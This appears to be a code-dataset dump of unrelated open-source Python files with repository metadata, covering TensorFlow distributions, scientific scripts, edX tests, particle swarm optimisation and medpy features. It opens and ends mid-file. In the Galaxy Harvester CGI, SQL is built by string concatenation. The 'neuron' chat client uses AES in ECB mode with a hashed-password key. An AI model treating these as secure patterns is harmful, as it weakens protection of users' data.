def __init__(self,
loc,
scale,
validate_args=False,
allow_nan_stats=True,
name="NormalWithSoftplusScale"):
parameters = dict(locals())
with ops.name_scope(name, values=[scale]) as name:
super(NormalWithSoftplusScale, self).__init__(
loc=loc,
scale=nn.softplus(scale, name="softplus_scale"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name)
self._parameters = parameters
@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
"""Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
Args:
n_a: instance of a Normal distribution object.
n_b: instance of a Normal distribution object.
name: (optional) Name to use for created operations.
default is "kl_normal_normal".
Returns:
Batchwise KL(n_a || n_b)
"""
with ops.name_scope(name, "kl_normal_normal", [n_a.loc, n_b.loc]):
one = constant_op.constant(1, dtype=n_a.dtype)
two = constant_op.constant(2, dtype=n_a.dtype)
half = constant_op.constant(0.5, dtype=n_a.dtype)
s_a_squared = math_ops.square(n_a.scale)
s_b_squared = math_ops.square(n_b.scale)
ratio = s_a_squared / s_b_squared
return (math_ops.squared_difference(n_a.loc, n_b.loc) / (two * s_b_squared)
+ half * (ratio - one - math_ops.log(ratio)))
|
tensorflow/tensorflow
|
tensorflow/python/ops/distributions/normal.py
|
Python
|
apache-2.0
| 9,713
|
[
"Gaussian"
] |
bf95dc3061945a06c2acaf8d99f11423951ef49400fe5c5a847470d46c9caaad
|
import pymol
from pymol import stored
from pymol import cmd, CmdException
import export_to_gl as glmol
cmd=pymol.cmd
input_file='4oe9.pdb'
cmd.load( input_file , '4oe9' )
modelName='4oe9'
|
S-John-S/MAT
|
as1_script.py
|
Python
|
mit
| 190
|
[
"PyMOL"
] |
0e9751ba2c9453ca203c22f138717bab12bcc44d7209d0de2238b9da4e2113e1
|
#!/usr/bin/python
"""
Copyright 2012 Paul Willworth <ioscode@gmail.com>
This file is part of Galaxy Harvester.
Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import Cookie
import dbSession
import dbShared
import cgi
import MySQLdb
try:
import json
except ImportError:
import simplejson as json
#
form = cgi.FieldStorage()
q = form.getfirst('query', '')
galaxy = form.getfirst('galaxy', '')
unavailable = form.getfirst('unavailable', '')
# escape input to prevent sql injection
q = dbShared.dbInsertSafe(q)
galaxy = dbShared.dbInsertSafe(galaxy)
errstr = ''
if galaxy.isdigit() == False:
errstr = 'Error: You must specify a galaxy.'
spawns = ['']
criteriaStr = ' WHERE galaxy = ' + str(galaxy)
if unavailable != 'on':
criteriaStr += ' AND unavailable IS NULL'
qlen = len(q)
if qlen > 0:
criteriaStr += ' AND SUBSTRING(spawnName, 1, ' + str(qlen) + ') = \'' + q + '\''
# Main program
print 'Content-type: text/html; charset=UTF-8\n'
if errstr == '':
conn = dbShared.ghConn()
cursor = conn.cursor()
if (cursor):
sqlStr = 'SELECT spawnName FROM tResources' + criteriaStr + ' ORDER BY spawnName'
#sys.stderr.write(sqlStr + '\n')
cursor.execute(sqlStr)
row = cursor.fetchone()
while (row != None):
spawns.append(row[0])
row = cursor.fetchone()
cursor.close()
conn.close()
print json.dumps({'query': q, 'suggestions': spawns})
else:
print errstr
|
druss316/G-Harvestor
|
html/getSpawnNames.py
|
Python
|
gpl-3.0
| 2,023
|
[
"Galaxy"
] |
faafc7793425e7b451154a30ad68dc974bb39b9a3d21452c22c6f4ba554c9889
|
# coding: utf-8
"""This file contains different utilities for the Parser."""
from redbaron import (CommentNode, ForNode, DefNode, WithNode,
IfNode, ElseNode, ElifNode, IfelseblockNode,
EndlNode)
from sympy import srepr
from pyccel.ast import DottedName
from sympy import Symbol
from sympy.printing.dot import dotprint
import os
pyccel_external_lib = {"mpi4py" : "pyccel.stdlib.external.mpi4py",
"scipy.linalg.lapack": "pyccel.stdlib.external.lapack",
"scipy.linalg.blas" : "pyccel.stdlib.external.blas",
"scipy.fftpack" : "pyccel.stdlib.external.dfftpack",
"fitpack" : "pyccel.stdlib.internal.fitpack",
"numpy.random" : "numpy",
"numpy.linalg" : "numpy",
"scipy.interpolate._fitpack":"pyccel.stdlib.external.fitpack"}
def read_file(filename):
"""Returns the source code from a filename."""
f = open(filename)
code = f.read()
f.close()
return code
# ... checking the validity of the filenames, using absolute paths
def _is_valid_filename(filename, ext):
"""Returns True if filename has the extension ext and exists."""
if not isinstance(filename, str):
return False
if not(ext == filename.split('.')[-1]):
return False
fname = os.path.abspath(filename)
return os.path.isfile(fname)
def is_valid_filename_py(filename):
"""Returns True if filename is an existing python file."""
return _is_valid_filename(filename, 'py')
def is_valid_filename_pyh(filename):
"""Returns True if filename is an existing pyccel header file."""
return _is_valid_filename(filename, 'pyh')
# ...
# ...
def header_statement(stmt, accel):
"""Returns stmt if a header statement. otherwise it returns None.
this function can be used as the following
>>> if header_statement(stmt):
# do stuff
...
"""
if not isinstance(stmt, CommentNode): None
if not stmt.value.startswith('#$'): None
header = stmt.value[2:].lstrip()
if not directive.startswith('header'): None
return stmt.value
# ...
# ... utilities for parsing OpenMP/OpenACC directives
def accelerator_statement(stmt, accel):
"""Returns stmt if an accelerator statement. otherwise it returns None.
this function can be used as the following
>>> if accelerator_statement(stmt, 'omp'):
# do stuff
...
In general you can use the functions omp_statement and acc_statement
"""
assert(accel in ['omp', 'acc'])
if not isinstance(stmt, CommentNode): None
if not stmt.value.startswith('#$'): None
directive = stmt.value[2:].lstrip()
if not directive.startswith(accel): None
return stmt.value
omp_statement = lambda x: accelerator_statement(x, 'omp')
acc_statement = lambda x: accelerator_statement(x, 'acc')
# ...
# ... preprocess fst for comments
get_comments = lambda y: y.filter(lambda x: isinstance(x, CommentNode))
get_loops = lambda y: y.filter(lambda x: isinstance(x, ForNode))
get_defs = lambda y: y.filter(lambda x: isinstance(x, DefNode))
get_withs = lambda y: y.filter(lambda x: isinstance(x, WithNode))
get_ifs = lambda y: y.filter(lambda x: isinstance(x, (IfNode, ElseNode, ElifNode)))
get_ifblocks = lambda y: y.filter(lambda x: isinstance(x, IfelseblockNode))
def fst_move_directives(x):
"""This function moves OpenMP/OpenAcc directives from loop statements to
their appropriate parent. This function will have inplace effect.
In order to understand why it is needed, let's take a look at the following
exampe
>>> code = '''
... #$ omp do schedule(runtime)
... for i in range(0, n):
... for j in range(0, m):
... a[i,j] = i-j
... #$ omp end do nowait
... '''
>>> from redbaron import RedBaron
>>> red = RedBaron(code)
>>> red
0 '\n'
1 #$ omp do schedule(runtime)
2 for i in range(0, n):
for j in range(0, m):
a[i,j] = i-j
#$ omp end do nowait
As you can see, the statement `#$ omp end do nowait` is inside the For
statement, while we would like to have it outside.
Now, let's apply our function
>>> fst_move_directives(red)
0 #$ omp do schedule(runtime)
1 for i in range(0, n):
for j in range(0, m):
a[i,j] = i-j
2 #$ omp end do nowait
"""
# ... def and with statements
defs = get_defs(x)
withs = get_withs(x)
containers = defs + withs
for stmt in containers:
fst_move_directives(stmt.value)
i_son = x.index(stmt)
while isinstance(stmt.value[-1], (CommentNode, EndlNode)):
cmt = stmt.value[-1]
stmt.value.remove(cmt)
# insert right after the function
x.insert(i_son + 1, cmt)
# ...
# ... if statements are inside IfelseblockNode
ifblocks = get_ifblocks(x)
for ifblock in ifblocks:
i_son = x.index(ifblock)
for stmt in ifblock.value:
fst_move_directives(stmt.value)
while isinstance(stmt.value[-1], (CommentNode, EndlNode)):
cmt = stmt.value[-1]
stmt.value.remove(cmt)
# insert right after the function
x.insert(i_son + 1, cmt)
# ...
# ... loops
xs = get_loops(x)
for son in xs:
fst_move_directives(son)
cmts = get_comments(son)
# we only take comments that are using OpenMP/OpenAcc
cmts = [i for i in cmts if omp_statement(i) or acc_statement(i)]
for cmt in cmts:
son.value.remove(cmt)
# insert right after the loop
i_son = x.index(son)
for i,cmt in enumerate(cmts):
son.parent.insert(i_son+i+1, cmt)
# ...
return x
# ...
# ...
def reconstruct_pragma_multilines(header):
"""Must be called once we visit an annotated comment, to get the remaining
parts of a statement written on multiple lines."""
# ...
def _is_pragma(x):
if not(isinstance(x, CommentNode) and x.value.startswith('#$')):
return False
env = x.value[2:].lstrip()
if (env.startswith('header') or
env.startswith('omp') or
env.startswith('acc')):
return False
return True
_ignore_stmt = lambda x: isinstance(x, (EndlNode, CommentNode)) and not _is_pragma(x)
def _is_multiline(x):
# we use tr/except to avoid treating nodes without .value
try:
return x.value.rstrip().endswith('&')
except:
return False
condition = lambda x: (_is_multiline(x.parent) and (_is_pragma(x) or _ignore_stmt(x)))
# ...
if not _is_multiline(header):
return header.value
ls = []
node = header.next
while condition(node):
# append the pragma stmt
if _is_pragma(node):
ls.append(node.value)
# look if there are comments or empty lines
node = node.next
if _ignore_stmt(node):
node = node.next
txt = ' '.join(i for i in ls)
txt = txt.replace('#$', '')
txt = txt.replace('&', '')
txt = '{} {}'.format(header.value.replace('&', ''), txt)
return txt
# ...
# ... utilities
def view_tree(expr):
"""Views a sympy expression tree."""
print (srepr(expr))
# ...
def get_default_path(name):
"""this function takes a an import name
and returns the path full bash of the library
if the library is in stdlib"""
name_ = name
if isinstance(name, (DottedName, Symbol)):
name_ = str(name)
if name_ in pyccel_external_lib.keys():
name = pyccel_external_lib[name_].split('.')
if len(name)>1:
return DottedName(*name)
else:
return name[0]
return name
|
ratnania/pyccel
|
pyccel/parser/utilities.py
|
Python
|
mit
| 7,995
|
[
"VisIt"
] |
c75ad30919adfd1925a3728064a2bf1a80ec5568f8976fcb1c7d70b73ef3ba86
|
# neuron_client
import base64
import sys, socket, select
from Crypto.Cipher import AES
import os
import hashlib
import signal
os.system("clear")
print """
~####~~~~####~~~######~~#####~~~######
##~~##~~##~~##~~~~##~~~~##~~~~~~~~##
##~~##~~##~~~~~~~~##~~~~####~~~~~~##
##~~##~~##~~##~~~~##~~~~##~~~~~~~~##
~####~~~~####~~~~~##~~~~#####~~~~~##
$$__$$_$$$$$$_$$$$$$_$$$$$$
_$$$$____$$_____$$______$$
__$$_____$$_____$$_____$$
_$$$$____$$_____$$____$$
$$__$$_$$$$$$_$$$$$$_$$$$$$
Octet | Power by Xiiz
"""
def sigint_handler(signum, frame):
print '\n user interrupt ! shutting down'
print "[info] shutting down NEURON \n\n"
sys.exit()
signal.signal(signal.SIGINT, sigint_handler)
def hasher(key):
hash_object = hashlib.sha512(key)
hexd = hash_object.hexdigest()
hash_object = hashlib.md5(hexd)
hex_dig = hash_object.hexdigest()
return hex_dig
def encrypt(secret,data):
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
cipher = AES.new(secret)
encoded = EncodeAES(cipher, data)
return encoded
def decrypt(secret,data):
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
decoded = DecodeAES(cipher, data)
return decoded
def chat_client():
if(len(sys.argv) < 5) :
print 'Usage : python neuron.py <hostname> <port> <password> <nick_name>'
sys.exit()
host = sys.argv[1]
port = int(sys.argv[2])
key = sys.argv[3]
key = hasher(key)
uname = sys.argv[4]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try :
s.connect((host, port))
except :
print "\033[91m"+'Unable to connect'+"\033[0m"
sys.exit()
print "Connected to remote host. You can start sending messages"
sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
while 1:
socket_list = [sys.stdin, s]
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
if sock == s:
data = sock.recv(4096)
if not data :
print "\033[91m"+"\nDisconnected from chat server"+"\033[0m"
sys.exit()
else :
data = decrypt(key,data)
sys.stdout.write(data)
sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
else :
msg = sys.stdin.readline()
msg = '[ '+ uname +': ] '+msg
msg = encrypt(key,msg)
s.send(msg)
sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
if __name__ == "__main__":
sys.exit(chat_client())
|
R1Jo/xiiz
|
neuron.py
|
Python
|
gpl-3.0
| 3,056
|
[
"NEURON"
] |
2aa00e8fb916c0e028d4e615d39eaec1fe52b6a1400c75bc940a548121ca1c51
|
import numpy as np
import pyfof
from halotools.sim_manager import CachedHaloCatalog
from halotools.empirical_models import PrebuiltHodModelFactory
from halotools.mock_observables import tpcf
from halotools.mock_observables import FoFGroups
from halotools.empirical_models.factories.mock_helpers import three_dim_pos_bundle
import util
from group_richness import gmf_bins
from group_richness import richness
from group_richness import gmf as GMF
from data_multislice import hardcoded_xi_bins
def build_nbar_xi_gmf_cov(Mr=21):
''' Build covariance matrix for the full nbar, xi, gmf data vector
using realisations of galaxy mocks for "data" HOD parameters in the
halos from the multidark simulation. Covariance matrices for different sets of observables
can be extracted from the full covariance matrix by slicing through
the indices.
'''
nbars = []
xir = []
gmfs = []
thr = -1. * np.float(Mr)
model = PrebuiltHodModelFactory('zheng07', threshold=thr)
halocat = CachedHaloCatalog(simname = 'multidark', redshift = 0, halo_finder = 'rockstar')
#some settings for tpcf calculations
rbins = hardcoded_xi_bins()
for i in xrange(1,125):
print 'mock#', i
# populate the mock subvolume
model.populate_mock(halocat)
# returning the positions of galaxies
pos = three_dim_pos_bundle(model.mock.galaxy_table, 'x', 'y', 'z')
# calculate nbar
nbars.append(len(pos) / 1000**3.)
# translate the positions of randoms to the new subbox
#calculate xi(r)
xi = tpcf(pos, rbins, period = model.mock.Lbox,
max_sample_size=int(2e5), estimator='Landy-Szalay')
xir.append(xi)
# calculate gmf
nbar = len(pos) / 1000**3.
b_normal = 0.75
b = b_normal * (nbar)**(-1./3)
groups = pyfof.friends_of_friends(pos , b)
w = np.array([len(x) for x in groups])
gbins = gmf_bins()
gmf = np.histogram(w , gbins)[0] / (1000.**3.)
gmfs.append(gmf) # GMF
# save nbar variance
nbar_var = np.var(nbars, axis=0, ddof=1)
nbar_file = ''.join([util.multidat_dir(), 'abc_nbar_var.Mr', str(Mr), '.dat'])
np.savetxt(nbar_file, [nbar_var])
# write full covariance matrix of various combinations of the data
# and invert for the likelihood evaluations
# --- covariance for all three ---
fulldatarr = np.hstack((np.array(nbars).reshape(len(nbars), 1),
np.array(xir),
np.array(gmfs)))
fullcov = np.cov(fulldatarr.T)
fullcorr = np.corrcoef(fulldatarr.T)
# and save the covariance matrix
nopoisson_file = ''.join([util.multidat_dir(), 'abc_nbar_xi_gmf_cov.no_poisson.Mr', str(Mr), '.dat'])
np.savetxt(nopoisson_file, fullcov)
# and a correlation matrix
full_corr_file = ''.join([util.multidat_dir(), 'abc_nbar_xi_gmf_corr.Mr', str(Mr), '.dat'])
np.savetxt(full_corr_file, fullcorr)
return None
if __name__ == "__main__":
build_nbar_xi_gmf_cov(Mr=21)
|
mjvakili/ccppabc
|
ccppabc/code/archive/abc_covariance.py
|
Python
|
mit
| 3,083
|
[
"Galaxy"
] |
9e56181437ce2089333cc6c1eeb2633b10c1c00a3b4eddf1b3699963e9c6b94d
|
"""Acceptance tests for LMS-hosted Programs pages"""
import pytest
from common.test.acceptance.fixtures.catalog import CatalogFixture, CatalogIntegrationMixin
from common.test.acceptance.fixtures.course import CourseFixture
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.catalog import CacheProgramsPage
from common.test.acceptance.pages.lms.programs import ProgramDetailsPage, ProgramListingPage
from common.test.acceptance.tests.helpers import UniqueCourseTest
from openedx.core.djangoapps.catalog.tests.factories import (
CourseFactory,
CourseRunFactory,
PathwayFactory,
ProgramFactory,
ProgramTypeFactory
)
class ProgramPageBase(ProgramsConfigMixin, CatalogIntegrationMixin, UniqueCourseTest):
"""Base class used for program listing page tests."""
def setUp(self):
super(ProgramPageBase, self).setUp()
self.set_programs_api_configuration(is_enabled=True)
self.programs = ProgramFactory.create_batch(3)
self.pathways = PathwayFactory.create_batch(3)
for pathway in self.pathways:
self.programs += pathway['programs']
# add some of the previously created programs to some pathways
self.pathways[0]['programs'].extend([self.programs[0], self.programs[1]])
self.pathways[1]['programs'].append(self.programs[0])
self.username = None
def auth(self, enroll=True):
"""Authenticate, enrolling the user in the configured course if requested."""
CourseFixture(**self.course_info).install()
course_id = self.course_id if enroll else None
auth_page = AutoAuthPage(self.browser, course_id=course_id)
auth_page.visit()
self.username = auth_page.user_info['username']
def create_program(self):
"""DRY helper for creating test program data."""
course_run = CourseRunFactory(key=self.course_id)
course = CourseFactory(course_runs=[course_run])
program_type = ProgramTypeFactory()
return ProgramFactory(courses=[course], type=program_type['name'])
def stub_catalog_api(self, programs, pathways):
"""
Stub the discovery service's program list and detail API endpoints, as well as
the credit pathway list endpoint.
"""
self.set_catalog_integration(is_enabled=True, service_username=self.username)
CatalogFixture().install_programs(programs)
program_types = [program['type'] for program in programs]
CatalogFixture().install_program_types(program_types)
CatalogFixture().install_pathways(pathways)
def cache_programs(self):
"""
Populate the LMS' cache of program data.
"""
cache_programs_page = CacheProgramsPage(self.browser)
cache_programs_page.visit()
class ProgramListingPageTest(ProgramPageBase):
"""Verify user-facing behavior of the program listing page."""
shard = 21
def setUp(self):
super(ProgramListingPageTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
def test_no_enrollments(self):
"""Verify that no cards appear when the user has no enrollments."""
self.auth(enroll=False)
self.stub_catalog_api(self.programs, self.pathways)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
def test_no_programs(self):
"""
Verify that no cards appear when the user has enrollments
but none are included in an active program.
"""
self.auth()
self.stub_catalog_api(self.programs, self.pathways)
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
@pytest.mark.a11y
class ProgramListingPageA11yTest(ProgramPageBase):
"""Test program listing page accessibility."""
def setUp(self):
super(ProgramListingPageA11yTest, self).setUp()
self.listing_page = ProgramListingPage(self.browser)
self.program = self.create_program()
def test_empty_a11y(self):
"""Test a11y of the page's empty state."""
self.auth(enroll=False)
self.stub_catalog_api(programs=[self.program], pathways=[])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertFalse(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
def test_cards_a11y(self):
"""Test a11y when program cards are present."""
self.auth()
self.stub_catalog_api(programs=[self.program], pathways=[])
self.cache_programs()
self.listing_page.visit()
self.assertTrue(self.listing_page.is_sidebar_present)
self.assertTrue(self.listing_page.are_cards_present)
self.listing_page.a11y_audit.check_for_accessibility_errors()
@pytest.mark.a11y
class ProgramDetailsPageA11yTest(ProgramPageBase):
"""Test program details page accessibility."""
def setUp(self):
super(ProgramDetailsPageA11yTest, self).setUp()
self.details_page = ProgramDetailsPage(self.browser)
self.program = self.create_program()
self.program['uuid'] = self.details_page.program_uuid
def test_a11y(self):
"""Test the page's a11y compliance."""
self.auth()
self.stub_catalog_api(programs=[self.program], pathways=[])
self.cache_programs()
self.details_page.visit()
self.details_page.a11y_audit.check_for_accessibility_errors()
|
teltek/edx-platform
|
common/test/acceptance/tests/lms/test_programs.py
|
Python
|
agpl-3.0
| 5,873
|
[
"VisIt"
] |
402394032a3bf650efe97af495a0f133978a513afc667803d3755a349aaf580d
|
#
# Post-processing script QE --> EPW
# 14/07/2015 - Samuel Ponce
#
import numpy as np
import os
# Enter the number of irr. q-points
user_input = raw_input('Enter the prefix used for PH calculations (e.g. diam)\n')
prefix = str(user_input)
# Enter the number of irr. q-points
user_input = raw_input('Enter the number of irreducible q-points\n')
nqpt = user_input
try:
nqpt = int(user_input)
except ValueError:
raise Exception('The value you enter is not an integer!')
os.system('mkdir save')
for iqpt in np.arange(1,nqpt+1):
label = str(iqpt)
os.system('cp '+prefix+'.dyn'+str(iqpt)+' save/'+prefix+'.dyn_q'+label)
if (iqpt == 1):
os.system('cp _ph0/'+prefix+'.dvscf1 save/'+prefix+'.dvscf_q'+label)
os.system('cp -r _ph0/'+prefix+'.phsave save/')
else:
os.system('cp _ph0/'+prefix+'.q_'+str(iqpt)+'/'+prefix+'.dvscf1 save/'+prefix+'.dvscf_q'+label)
os.system('rm _ph0/'+prefix+'.q_'+str(iqpt)+'/*wfc*' )
|
mmdg-oxford/papers
|
Verdi-NCOMMS-2017/code/EPW/tests/Inputs/t05/pp.py
|
Python
|
gpl-3.0
| 943
|
[
"EPW"
] |
fac55c3edaafc3f17ea1e001f04b91191cf1821f7cd7b71afcf8949aba4993ba
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
class ElasticLines(object):
"""Store blocks of content separated by dashed lines.
Each dashed line (separator) is as long as the longest content
(non-separator) line.
"""
def __init__(self):
self._lines = []
self._separator_idxs = []
self._max_line_len = -1
def add_line(self, line):
line_len = len(line)
if line_len > self._max_line_len:
self._max_line_len = line_len
self._lines.append(line)
def add_lines(self, lines):
for line in lines:
self.add_line(line)
def add_separator(self):
self._lines.append(None)
self._separator_idxs.append(len(self._lines) - 1)
def to_str(self):
separator = '-' * self._max_line_len
for idx in self._separator_idxs:
self._lines[idx] = separator
return '\n'.join(self._lines)
|
xguse/scikit-bio
|
skbio/sequence/_base.py
|
Python
|
bsd-3-clause
| 1,304
|
[
"scikit-bio"
] |
cd3613d3f9cd4202a39cb222d6dccbbfc41c0a2e7adfa20db085ca696490550c
|
#!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 2: Nature-Inspired Algorithms
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2014 by Jeff Heaton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
"""
from random import *
import numpy as np
class TrainPSO:
def __init__(self,particle_count,param_count,score_function):
# The current error.
self.current_error = 0
# The scoring function, this determines the energy (error) of the current solution.
self.score_function = score_function
self.goal_minimize = True
self.display_iteration = True
# Swarm state and memories.
self.param_count = param_count
self.particles = np.zeros([particle_count,param_count], dtype=float)
self.velocities = np.zeros([particle_count,param_count], dtype=float)
self.best_vectors = np.zeros([particle_count,param_count], dtype=float)
self.best_scores = np.zeros([particle_count], dtype=float)
self.best_vector_index = -1
# Determines the size of the search space.
# The position components of particle will be bounded to
# [-maxPos, maxPos]
# A well chosen range can improve the performance.
# -1 is a special value that represents boundless search space.
self.max_position = -1
# Maximum change one particle can take during one iteration.
# Imposes a limit on the maximum absolute value of the velocity
# components of a particle.
# Affects the granularity of the search.
# If too high, particle can fly past optimum solution.
# If too low, particle can get stuck in local minima.
# Usually set to a fraction of the dynamic range of the search
# space (10% was shown to be good for high dimensional problems).
# -1 is a special value that represents boundless velocities.
self.max_velocity = 2
# c1, cognitive learning rate >= 0
# tendency to return to personal best position
self.c1 = 2.0
# c2, social learning rate >= 0
# tendency to move towards the swarm best position
self.c2 = 2.0
# w, inertia weight.
# Controls global (higher value) vs local exploration
# of the search space.
# Analogous to temperature in simulated annealing.
# Must be chosen carefully or gradually decreased over time.
# Value usually between 0 and 1.
self.inertia_weight = 0.4
# Random particles
for row in range(0,particle_count):
# Random position
for col in range(0,param_count):
self.particles[row][col] = uniform(-1,1)
# Random velocity
for col in range(0,param_count):
self.velocities[row][col] = uniform(-self.max_velocity,self.max_velocity)
def clamp_components(self,v,max_value):
if max_value != -1:
for i in range(0,len(v)):
if v[i] > max_value:
v[i] = max_value
if v[i] < -max_value:
v[i] = -max_value
def update_velocity(self,particle_index):
# Standard PSO formula
# inertia weight
for i in range(0,self.param_count):
self.velocities[particle_index][i]*=self.inertia_weight
for i in range(0,self.param_count):
# cognitive term (personal best)
ct = (self.best_vectors[particle_index][i] - self.particles[particle_index][i]) * uniform(0,1) * self.c1
self.velocities[particle_index][i] += ct
# social term (global best)
if particle_index != self.best_vector_index:
st = (self.best_vectors[self.best_vector_index][i] - self.particles[particle_index][i]) * uniform(0,1) * self.c1
self.velocities[particle_index][i] += st
def update_personal_best_position(self,particle_index, particle_position):
# set the network weights and biases from the vector
score = self.score_function(self.particles[particle_index])
# update the best vectors (g and i)
if self.best_scores[particle_index] == 0 or self.is_score_better(score, self.best_scores[particle_index]):
self.best_scores[particle_index] = score
for i in range(0,self.param_count):
self.best_vectors[particle_index][i] = self.particles[particle_index][i]
def is_score_better(self,score1,score2):
return (self.goal_minimize and (score1 < score2)) \
or (not self.goal_minimize and (score1 > score2))
def update_particle(self,particle_index):
self.update_velocity(particle_index)
# velocity clamping
self.clamp_components(self.velocities[particle_index], self.max_velocity)
# new position (Xt = Xt-1 + Vt)
for i in range(0,self.param_count):
self.particles[particle_index][i]+=self.velocities[particle_index][i]
# pin the particle against the boundary of the search space.
# (only for the components exceeding maxPosition)
self.clamp_components(self.particles[particle_index], self.max_position)
self.update_personal_best_position(particle_index, self.particles[particle_index])
def update_global_best_position(self):
for i in range(0,len(self.particles)):
if self.best_vector_index == -1 \
or self.is_score_better(self.best_scores[i], self.best_scores[self.best_vector_index]):
self.best_vector_index = i
def iteration(self):
for i in range(0,len(self.particles)):
self.update_particle(i)
self.update_global_best_position()
def get_best(self):
return self.best_vectors[self.best_vector_index]
def get_best_score(self):
return self.best_scores[self.best_vector_index]
def copy_best(self,target):
b = self.get_best()
for i in range(len(b)):
target[i] = b[i]
def train(self,max_iterations=100):
for i in range(0,max_iterations):
self.iteration()
if self.display_iteration:
print("Iteration #"+str(i) + ", best score=" + str(self.best_scores[self.best_vector_index]))
|
PeterLauris/aifh
|
vol2/vol2-python-examples/lib/aifh/pso.py
|
Python
|
apache-2.0
| 7,032
|
[
"VisIt"
] |
fa734eae8e62769ceee1f407a1a2127484a02fefa6bfe6cba1f5849e7a677502
|
"""
@package medpy.features.intensity
Functions to extracts voxel-wise intensity based features from images.
Feature representation:
Features can be one or more dimensional and are kept in the following structures:
s1 s2 s3 [...]
f1.1
f1.2
f2.1
f3.1
f3.2
[...]
, where each column sX denotes a single sample (voxel) and each row a features element
e.g. f1 is constitutes a 2-dimensional features and occupies therefore two rows, while
f2 is a single element features with a single row. Entries of this array are of type
float.
These feature representation forms are processable by the scikit-learn machine learning
methods.
Multi-spectral images:
This package was originally designed for MR images and is therefore suited to handle
multi-spectral data such as RGB and MR images. Each feature extraction function can be
supplied with list/tuple of images instead of an image. in which case they are considered
co-registered and the feature is extracted from all of them independently.
@author Oskar Maier
@version r0.2.3
@since 2013-08-24
@status Release
"""
# build-in module
# third-party modules
import numpy
from scipy.ndimage.filters import gaussian_filter, gaussian_gradient_magnitude,\
median_filter
from scipy.interpolate.interpolate import interp1d
from scipy.ndimage._ni_support import _get_output
# own modules
from medpy.features import utilities
from medpy.core.exceptions import ArgumentError
from medpy.features.utilities import join
from medpy.filter.image import sum_filter
# constants
def intensities(image, mask = slice(None)):
"""
Takes a simple or multi-spectral image and returns its voxel-wise intensities.
A multi-spectral image must be supplied as a list or tuple of its spectra.
Optionally a binary mask can be supplied to select the voxels for which the feature
should be extracted.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param mask a binary mask for the image
@type mask ndarray
@return the images intensities
@type ndarray
"""
return __extract_feature(__extract_intensities, image, mask)
def centerdistance(image, voxelspacing = None, mask = slice(None)):
"""
Takes a simple or multi-spectral image and returns its voxel-wise center distance in
mm. A multi-spectral image must be supplied as a list or tuple of its spectra.
Optionally a binary mask can be supplied to select the voxels for which the feature
should be extracted.
The center distance is the exact euclidean distance in mm of each voxels center to
the central point of the overal image volume.
Note that this feature is independent of the actual image content, but depends
solely on its shape. Therefore always a one-dimensional feature is returned, even if
a multi-spectral image has been supplied.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
@param voxelspacing the side-length of each voxel
@type voxelspacing sequence of floats
@param mask a binary mask for the image
@type mask ndarray
@return the distance of each voxel to the images center
@type ndarray
"""
if type(image) == tuple or type(image) == list:
image = image[0]
return __extract_feature(__extract_centerdistance, image, mask, voxelspacing = voxelspacing)
def centerdistance_xdminus1(image, dim, voxelspacing = None, mask = slice(None)):
"""
Implementation of @see centerdistance that allows to compute sub-volume wise
centerdistances.
The same notes as for @see centerdistance apply.
Example:
Considering a 3D medical image we want to compute the axial slice-wise
centerdistances instead of the ones over the complete image volume. Assuming that
the third image dimension corresponds to the axial axes of the image, we call
centerdistance_xdminus1(image, 2)
Note that the centerdistance of each slice is the same.
@param image a single image or a list/tuple of images (for multi-spectral case)
@type image ndarray | list of ndarrays | tuple of ndarrays
